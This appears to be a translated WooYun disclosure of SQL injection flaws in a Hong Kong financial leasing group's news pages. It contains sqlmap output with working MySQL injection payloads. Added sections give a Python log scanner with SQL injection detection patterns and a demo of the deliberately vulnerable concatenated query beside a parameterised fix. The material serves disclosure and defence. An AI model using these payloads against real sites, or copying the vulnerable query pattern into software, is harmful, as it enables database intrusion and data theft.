
Vulnerability summary (followers: 24)

Defect ID: wooyun-2016-0175048

Title: Multiple SQL injections on the main site of China Financial Leasing Group (中國金融租賃集團), bundled submission (Hong Kong)

Vendor: China Financial Leasing Group (中國金融租賃集團)

Author: 路人甲

Submitted: 2016-02-16 09:44

Fixed: 2016-02-17 14:42

Published: 2016-02-17 14:42

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed to a third-party partner organisation (HKCERT, Hong Kong Computer Emergency Response Team Coordination Centre) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]

Bookmarked by 4 users


Vulnerability details

Disclosure status:

2016-02-16: Details sent to the vendor; awaiting the vendor's response
2016-02-17: Vendor confirmed; details visible to the vendor only
2016-02-17: Vendor fixed the vulnerability and chose to publish; details visible to the public

Summary:

Multiple SQL injections on the main site of China Financial Leasing Group, bundled submission

Detailed description:

[Injection points]:
http://**.**.**.**/c/industry_news_details.php?itemid=479&page=1
http://www.**.**.**.**/c/corp_news_details.php?itemid=455&page=01
http://**.**.**.**/s/corp_news_details.php?itemid=455&page=01
These live in different files (some in different subdirectories), so they are separate injection points.
[Manual test]
Change the request to: http://**.**.**.**/s/corp_news_details.php?itemid=455%27&page=01
The page returns a database error message, and the error also discloses the server-side path.

[Screenshot: 2.png]


[sqlmap screenshot]
Database information:

[Screenshot: 1.png]


[WooYun duplicate check]
I searched for the vendor name and found only http://**.**.**.**/bugs/wooyun-2010-0163764,
but the file I report is not the same as the one in that report.

Proof of vulnerability:

Full sqlmap output:

[10:07:16] [INFO] testing connection to the target URL
[10:07:17] [INFO] testing if the target URL is stable. This can take a couple of seconds
[10:07:18] [INFO] target URL is stable
[10:07:18] [INFO] testing if GET parameter 'itemid' is dynamic
[10:07:18] [INFO] confirming that GET parameter 'itemid' is dynamic
[10:07:18] [INFO] GET parameter 'itemid' is dynamic
[10:07:19] [INFO] heuristic (basic) test shows that GET parameter 'itemid' might be injectable (possible DBMS: 'MySQL')
[10:07:19] [INFO] testing for SQL injection on GET parameter 'itemid'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[10:07:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:07:21] [WARNING] reflective value(s) found and filtering out
[10:07:22] [INFO] GET parameter 'itemid' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[10:07:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:07:22] [INFO] GET parameter 'itemid' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[10:07:22] [INFO] testing 'MySQL inline queries'
[10:07:23] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:07:23] [WARNING] time-based comparison requires larger statistical model, please wait..................
[10:07:26] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:07:26] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:07:37] [INFO] GET parameter 'itemid' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
[10:07:37] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[10:07:37] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:07:37] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:07:38] [INFO] target URL appears to have 5 columns in query
[10:07:40] [INFO] GET parameter 'itemid' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'itemid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 40 HTTP(s) requests:
---
Parameter: itemid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: itemid=455 AND 2922=2922&page=01

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: itemid=455 AND (SELECT 1959 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (CASE WHEN (1959=1959) THEN 1 ELSE 0 END)),0x716a627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&page=01

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: itemid=455 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7671,0x477a427148656c74436d,0x716a627171),NULL,NULL#&page=01

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: itemid=455 AND SLEEP(5)&page=01
---
[10:07:44] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29, Apache 2
back-end DBMS: MySQL 5.0
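The sqlmap output above is what the attacking side sees. For the defending side, the same four techniques leave a recognisable trail in the web server's access log. The following is an added example, not part of the report and not the affected site's code: it parses Apache combined-format lines and flags requests whose `itemid` or `page` value is not an integer or carries one of the payload shapes sqlmap listed (boolean tautology, `SLEEP(`, `UNION ... SELECT`, error-based `SELECT ... FROM`, `CONCAT(`, hex literals). The log lines, the source addresses and the assumption that `itemid` and `page` are integer-only parameters are all constructed for the example; the payload strings are the ones in the sqlmap output.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed Apache combined-log lines (not from the report). The itemid values are the
# manual test and the sqlmap payloads listed in the report, URL-encoded as a server would log them.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Feb/2016:10:07:16 +0800] "GET /s/corp_news_details.php?itemid=455&page=01 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [16/Feb/2016:10:07:17 +0800] "GET /s/corp_news_details.php?itemid=455%27&page=01 HTTP/1.1" 200 1880 "-" "Mozilla/5.0"
203.0.113.5 - - [16/Feb/2016:10:07:21 +0800] "GET /s/corp_news_details.php?itemid=455%20AND%202922%3D2922&page=01 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev"
203.0.113.5 - - [16/Feb/2016:10:07:26 +0800] "GET /s/corp_news_details.php?itemid=455%20AND%20SLEEP%285%29&page=01 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev"
203.0.113.5 - - [16/Feb/2016:10:07:40 +0800] "GET /s/corp_news_details.php?itemid=455%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x71627a7671%2C0x716a627171%29%2CNULL%2CNULL%23&page=01 HTTP/1.1" 200 5200 "-" "sqlmap/1.0-dev"
198.51.100.7 - - [16/Feb/2016:10:09:00 +0800] "GET /c/industry_news_details.php?itemid=479&page=1 HTTP/1.1" 200 4800 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Parameters the application only ever expects as integers (assumption drawn from the URLs in the report).
INT_PARAMS = {"itemid", "page"}

# One signature per technique sqlmap reported: boolean-based, error-based, UNION and time-based.
SQLI_RE = re.compile(r"""(?ix)
    \bAND\s+\d+\s*=\s*\d+       # boolean-based blind: AND 2922=2922
  | \bSLEEP\s*\(                # time-based blind: AND SLEEP(5)
  | \bUNION\s+(ALL\s+)?SELECT   # UNION query
  | \bSELECT\b.+\bFROM\b        # error-based subquery: SELECT ... FROM(SELECT COUNT(*) ...
  | \bCONCAT\s*\(               # marker wrapping used by the error-based and UNION payloads
  | 0x[0-9a-f]{6,}              # hex string literals such as 0x71627a7671
""")


def inspect_line(line):
    """Return a finding dict for one log line, or None if the request looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    reasons = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            value = unquote_plus(value)  # parse_qs decoded once; this pass catches double-encoding
            if name in INT_PARAMS and not value.isdigit():
                reasons.append(f"{name}: non-numeric value {value!r}")
            if SQLI_RE.search(value):
                reasons.append(f"{name}: SQL injection signature")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "path": parts.path,
            "ua": m.group("ua"), "reasons": reasons}


def scan_log(text):
    """Run inspect_line over every line and return the findings in log order."""
    return [hit for hit in (inspect_line(l) for l in text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["path"], "|", "; ".join(hit["reasons"]))
```

The integer check alone catches the manual `%27` probe, which no keyword signature would; the signatures add the technique name for triage. In practice you would aggregate the findings per source address and per script path, which is enough to see one client walking through the whole sqlmap sequence against `/s/corp_news_details.php` within a minute.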

Fix suggestion:

PS: A question for the reviewers: when submitting Hong Kong or Taiwan vulnerabilities in future, do they all need to be written in Traditional Chinese, or is Simplified Chinese acceptable?
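The report leaves the fix section empty. The following is an added example, not code from the report or from the affected site, that reproduces the two defects the manual test exposed (the `itemid` value spliced into the SQL text, and the raw database error echoed to the visitor together with the script path) and shows the hardened form beside it: validate the type, bind the value as a query parameter, and never return database error text to the client. SQLite stands in for the MySQL back end; the table, its rows, the `corp_news` name and the placeholder script path are all constructed for the example.

```python
import sqlite3

# Constructed stand-in for the news table behind corp_news_details.php (the real schema is not
# on the page). SQLite in memory replaces the site's MySQL 5.0 back end.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE corp_news (itemid INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    conn.executemany(
        "INSERT INTO corp_news VALUES (?, ?, ?)",
        [(455, "Corporate news 455", 1), (479, "Industry news 479", 1), (900, "Unpublished draft", 0)],
    )
    conn.commit()
    return conn


# Placeholder for the server-side path the report says the error page disclosed.
FAKE_SCRIPT_PATH = "/var/www/html/s/corp_news_details.php"  # constructed, not the real path


def render_vulnerable(conn, itemid):
    """The pattern the report implies: the raw itemid string is concatenated into the SQL text,
    and a database error is rendered straight to the client (PHP display_errors-style failure)."""
    sql = "SELECT itemid, title FROM corp_news WHERE published = 1 AND itemid = " + itemid
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # What the visitor sees after itemid=455%27: the DB error text plus the script path.
        return f"Database error: {exc} in {FAKE_SCRIPT_PATH}"


def render_safe(conn, itemid):
    """Hardened version: type-check the input, bind it as a parameter, never echo DB errors."""
    if not itemid.isdigit():
        return []  # "455'" and "455 AND 2922=2922" are rejected before any SQL is built
    try:
        cur = conn.execute(
            "SELECT itemid, title FROM corp_news WHERE published = 1 AND itemid = ?",
            (int(itemid),),
        )
        return cur.fetchall()
    except sqlite3.Error:
        # A real application logs the exception server-side; the client only gets an empty result.
        return []


if __name__ == "__main__":
    db = make_db()
    print(render_vulnerable(db, "455"))                # the legitimate request
    print(render_vulnerable(db, "455'"))               # the report's manual test: error text + path
    print(render_vulnerable(db, "455 AND 2922=2922"))  # boolean-based blind: the row comes back ...
    print(render_vulnerable(db, "455 AND 2922=2923"))  # ... and here it does not (the oracle)
    print(render_safe(db, "455'"))                     # hardened: no error, no row, nothing leaked
```

The two `render_vulnerable` calls with `2922=2922` and `2922=2923` show why sqlmap could confirm the boolean-based blind technique without any error message at all: the page content differs depending on whether the injected condition is true. Parameter binding removes that channel because the whole string is compared as a value, and the integer check on top keeps malformed input from reaching the database in the first place.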

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed at: 2016-02-17 12:38

Vendor reply:

The incident has been reported to the relevant organisation.

Latest status:

2016-02-17: The relevant organisation reports that the vulnerability has been fixed.